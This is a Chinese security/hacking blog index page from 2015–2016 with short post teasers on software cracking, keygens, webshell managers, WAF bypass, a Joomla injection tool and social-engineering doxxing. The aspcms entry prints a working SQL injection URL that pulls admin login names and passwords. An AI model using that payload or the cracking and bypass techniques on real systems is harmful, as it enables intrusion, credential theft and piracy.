密码学经典《Alice和Bob的故事》中文版(一幅充满情怀的漫画)
2016-01-30

【前言】 Wind Punish网络安全团队翻译部的第一部作品终于诞生了,我们选择了密码学中经典的漫画《Alice and Bob》,作为我们的第一个项目。 Alice和Bob这一对情侣,就像是学校里英文教科书中的李雷和韩梅梅一样,他们奇妙而平凡的生活,陪伴许多人走过了学习的历程,如果没有Alice和Bob, 你会在密码学教科书上看到这样的描述:A 与某个声称自己是 B 的人通信。为了确保无误,A 必须先看看 B 是否知道密码 K。因此 A 向 B 发送…

[Wordpress]知更鸟begin1.8主题破解教程!!!!
2016-01-30

又是一个通宵,刚出去吃过早饭,视频教程也上传完毕。 一直说给各位来录制一个知更鸟begin主题的破解教程,但是一直没录制,前两天刚拿到最新版本的1.8版本主题包,正好有了原版主题包,所以就给各位录制一下,如何破解吧! 虽然1.8版本的主题增加了三个主题授权判断,但是不影响,旧版本的破解教程也是这样,只是去除了 后面的三个文件判断文件!!!! 视频是上传到乐视云点播里的,可能会出现转码后造成不清晰的问题,自己也观看了一边,的确有点不清晰,但是呢我博客里有文…

公布下QQ公众号(购物号)注册方法
2016-01-27

一、打开 www.weidian.com,注册一个“微店”的帐号。已有的可以直接登录。 二、申请开通一个微店。 三、点击左侧导航下方的【加入购物号】 四、点击【前往QQ购物号】,使用你的QQ登录。 五、根据自己的条件,选择对应的类型。个人和企业均可注册QQ购物号,所需资料和微信公众号基本一样。填写完资料,以后等待审核。

2016最新协成WIFI认证系统完整开源版源码,协成WIFI二次开发版,
2016-01-15

这里特别说明下这个版本和其他的版本的区别:1:支持微信连wifi的功能了,可以直接让用户自动选择关注微信公众号了。支持中文ssid 2:去掉了商户显示在线用户ip的功能,改为了显示在线用户是属于哪个路由器终端ID。可以在商户的路由管理处直接查看对应路由器,方便查询究竟我上网的用户是属于哪一个终端。测试截图: …

成为软文营销高手的秘笈珍藏版(共4课)
2016-01-15

窗式、口号类广告的袭扰下,越来越多的用户对这类硬性广告产生反感的情绪,软文营销高性价比的优势逐渐凸显,对于网络营销来讲,不管是论坛营销、微博微信、博客营销,又或者是病毒式营销和事件营销,软文都以其非常强烈的指引式代入感渗透影响着用户的心理,一篇好的软文能引发用户自主购买、自发传播,产生裂变的效果。而一个好的软文营销高手,年薪百万不是梦想,你所需要的就是练就这些技能,成为一个高手。…

Cknife网站管理工具(C刀)全平台版发布
2015-12-31

Burp已经成了绿帽子门必不可少的工具,相信大家都装有Java环境,本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。 一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。顺便当个码农~~~ 前前后后大约花了一个月,除了打飞机的时间基本就在写这货了,这里要感谢@MelodyZX  牛,在我完成大体框架后,帮了我不少大忙,包括完成…

CVE-2015-7857 Joomla注入漏洞利用工具
2015-12-12

文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、MacOSX、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理等一些基本功能外,还可以通过其提供的上千个插件进行功能扩展。同时它还支持多种语言,由于它的功能非常强大,…

专访民间黑客"核攻击":在自己的道路上,谱写自己的传奇
2015-12-11

核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多本期我们采访了核攻击。核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多。第一次被采访,第一次讲诉自己的经历,第一次讲诉对安全的认识。土司人物采访中的好多朋友都是第一次被采访,过去几期是这样,以后的采访也会是这样。本系列文章目的在于以技术大牛的自诉成长等形式给安全行业增加些我们的思考。…

黑客酒会拿走ipad,被200名黑客社会工程学30分钟拿下!
2015-12-11

黑客通过各种手段在只有一个微信号的情况下,得到此人姓名,年龄,性别,邮箱,Qq,Qq群,开过什么公司,电话号,之前用过的电话号,支付宝信息,常去网站,等等,虽然走了一些弯路,最终结果以及过程乌云黑客酒会'拿'走ip…

程序猿也疯狂:一款插件给写代码带来的超爽视觉震撼
2015-12-04

最近被开发者微博圈刷屏的Atom编辑器插件,插件效果图如下:<img src="http://image.3001.net/images/20151130/14488…

不堪回首的过往
2015-12-03

曾经在高二的时候认识一个日本妹子,朋友介绍的,长得很可爱,身高一米六左右……老家是北海道那边的, 她的声音甜甜的,轻柔不做作,爱笑,性格嘛,特别温柔,独处的时候像猫一样温顺,黏在身边,一起看电视聊聊天。性格还是有点害羞的,人多的时候也会不好意思,腼腆地笑笑, 皮肤很白,像雪,像北海道的雪。 妹子话不多,因为我听不懂太多深奥的日语……好在她的想法基本都写在脸上,盯着她看就能猜到她的心情。 …… 近距离看,长长的眼睫毛想让人亲一口。…

过狗shell文件管理
2015-12-03

安全狗扫描过狗shell界面  …

aspcms各版本漏洞0day集合
2015-12-02

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1———————————————————————— Powered by AspCms2.0 未验证权…

multipart/form-data PHP和Java通用的WAF绕过方法
2015-12-01

依旧是multipart/form-data,去年的时候说道了利用PHP的特性去绕过WAF.轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 原文简单的描述了PHP在处理POST请求的时候会解析multipart/form-data的内容。 那么这个multipart/form-data到底是个啥呢? …

GourdScan分布式被动注入漏洞扫描工具
2015-12-01

  GourdScan 之前俩个轮子中的一个的升级版,谈不上神器。 谈谈升级了哪些:1.更新了代理的方式,抛弃了占用内存极高的burp,采用了tornado进行代理,缺点是暂不支持https的代理。 2.更新了测试的逻辑,不会因为sqlmapapi的出错导致代理的挂起。 3.添加了分布式的支持,其实也就是通过mysql查询出正在运行任务最少的机器进…

各种设计软件.注册机.设计素材.网站设计教程.设计建筑站长必备资源
2015-12-01

资源超级合集【有各种设计软件.注册机…

七夕送给女友一个私人定制的专属礼物吧
2015-12-01

先看个成品(新手制作,雕刻师傅轻喷) 自行在某宝上搜索 【红木料头】挺便宜的,不放连接,不做推广…

PHP机器猫圈圈助手2.0网站源码
2015-11-29

机器猫圈圈助手2.0.zip…

女朋友和你妈同时掉水里
2015-11-29

女孩问男孩“我和你妈一起掉进河里了,你先救谁?”男孩沉默不语,女孩生气的走了。第二天再见到女孩,男孩手里拿了两套泳衣,说:“我教你游泳吧,到时候我们一起救我妈。”正当女孩把衣服脱下,准备换上泳衣时,男孩把她上了